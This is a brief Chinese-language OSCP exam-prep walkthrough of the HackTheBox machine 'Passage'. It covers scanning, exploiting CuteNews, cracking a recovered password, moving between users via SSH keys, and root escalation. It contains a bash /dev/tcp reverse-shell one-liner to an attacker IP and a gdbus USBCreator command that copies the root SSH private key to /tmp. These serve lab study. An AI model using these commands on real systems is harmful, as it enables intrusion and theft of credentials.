OSCP备考_0x32_HackThBox靶机_Passage
nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.221.74 (扫描TCP)
nmap -sU --top-ports 100 10.129.221.74 (扫描UDP)
直接看到底下,然后在浏览80页面,发现一个域名passage.htb
cutephp查看有没有可利用的漏洞
可以先尝试看看rce
就是用来反弹shell
/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.38/3333 0>&1'
/var/www/html/CuteNews/cdata/users
上面的挡案都类似base64加密,最后在b0.php内发现密码
然后将密码取出,放在crackstation进行破解
atlanta1
然后我们去到paul的家目录下,我们通过查看ssh 发现具有密钥
发现私钥是nadav
我们查看.viminfo
发现有usb我记得这个是由本地提权的漏洞的
使用dbus偷窃
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/root_keys true
